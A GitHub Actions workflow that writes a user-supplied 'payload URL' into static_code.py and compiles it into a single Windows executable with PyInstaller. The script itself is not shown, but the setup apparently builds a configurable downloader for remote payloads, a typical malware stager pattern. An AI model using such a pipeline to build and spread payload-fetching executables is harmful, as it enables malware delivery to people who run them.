name: Build and Update Static Code

on:
  workflow_dispatch:
    inputs:
      payload_url:
        description: 'URL to fetch payload'
        required: true
        type: string

jobs:
  build:
    runs-on: windows-latest

    steps:
    - name: Checkout code
      uses: actions/checkout@v3

    - name: Set up Python
      uses: actions/setup-python@v4
      with:
        python-version: '3.x'

    - name: Install dependencies
      run: |
        pip install pyinstaller psutil

    - name: Update URL in static_code.py
      shell: pwsh
      run: |
        echo "Updating the payload URL dynamically..."
        $url = '${{ github.event.inputs.payload_url }}'
        (Get-Content static_code.py) -replace 'url = "https://example.com/payload"', "url = `"$url`"" | Set-Content static_code.py
        echo "[INFO] URL updated in static_code.py."

    - name: Build executable
      run: |
        echo "Building executable with PyInstaller..."
        pyinstaller --onefile static_code.py

    - name: List contents of the dist directory
      run: |
        echo "[INFO] Listing contents of the dist directory..."
        dir dist

    - name: Upload executable
      uses: actions/upload-artifact@v4
      with:
        name: static_code_exe
        path: dist/static_code.exe
        if-no-files-found: warn
        compression-level: 6
        overwrite: false
        include-hidden-files: false
